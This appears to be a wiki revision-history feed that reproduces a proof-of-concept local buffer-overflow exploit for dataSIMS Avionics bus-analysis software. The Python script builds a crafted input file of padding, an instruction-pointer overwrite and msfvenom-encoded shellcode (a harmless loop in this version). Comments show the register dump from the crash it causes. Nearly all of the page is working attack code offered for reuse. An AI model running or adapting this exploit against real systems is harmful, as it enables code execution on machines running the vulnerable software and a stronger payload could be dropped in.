https://pwnwiki.com/index.php?action=history&feed=atom&title=DataSIMS_Avionics_ARINC_664-1_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E 2026-04-26T13:57:33Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=DataSIMS_Avionics_ARINC_664-1_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=639&oldid=prev 2021-03-23T02:41:06Z

<p>Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC) # Exploit Author: Kağan Çapar # Date: 2020-02-17 # Vendor Homepage: https://www.d...&quot;</p> <p><b>New page</b></p><div>==POC==<br /> &lt;pre&gt;<br /> # Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)<br /> # Exploit Author: Kağan Çapar<br /> # Date: 2020-02-17<br /> # Vendor Homepage: https://www.ddc-web.com/<br /> # Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414<br /> # Version: 4.5.3<br /> # Tested On: Windows 10 Enterprise (x64)<br /> # about Sofware: <br /> # dataSIMS, an all-in-one Avionics Bus Analysis &amp; Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.<br /> # about ARINC 664-1:<br /> # ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. <br /> # Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).<br /> <br /> #!/usr/bin/env python<br /> # -*- coding: UTF-8 -*-<br /> <br /> import struct<br /> import binascii<br /> import os<br /> import sys<br /> <br /> #EAX : 00000000<br /> #EBX : 00000000<br /> #ECX : 42424242<br /> #EDX : 77B96330 ntdll.77B96330<br /> #EBP : 000A1328<br /> #ESP : 000A1308<br /> #ESI : 00000000<br /> #EDI : 00000000<br /> #EIP : 42424242<br /> #EFLAGS : 00010246<br /> <br /> #LastError : 00000000 (ERROR_SUCCESS)<br /> #LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)<br /> #Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!<br /> <br /> file = open(&quot;milstd1553result.txt&quot;, &quot;w&quot;)<br /> junk = &quot;\x41&quot; * 600<br /> align = &quot;\x32&quot; * 4 + &quot;\x31&quot; * 4<br /> prop = &quot;\x43&quot; * 380<br /> imp = &quot;\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32&quot;<br /> imp2 = &quot;\x61\x72\x61\x63\x61\x67\x131\x7a&quot;<br /> <br /> #EIP Overwrite junk value<br /> overwrite = &quot;\x42&quot; * 4<br /> <br /> #Payload size: 29 bytes<br /> #Final size of py file: 160 bytes<br /> <br /> #msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai<br /> <br /> buf = b&quot;&quot;<br /> buf += b&quot;\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33&quot;<br /> buf += b&quot;\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9&quot;<br /> buf += b&quot;\x8b\x7c\x9c&quot;<br /> <br /> win32 = junk + align + prop + imp + imp2 + overwrite + buf<br /> <br /> print len(win32)<br /> file.write(win32)<br /> file.close()<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki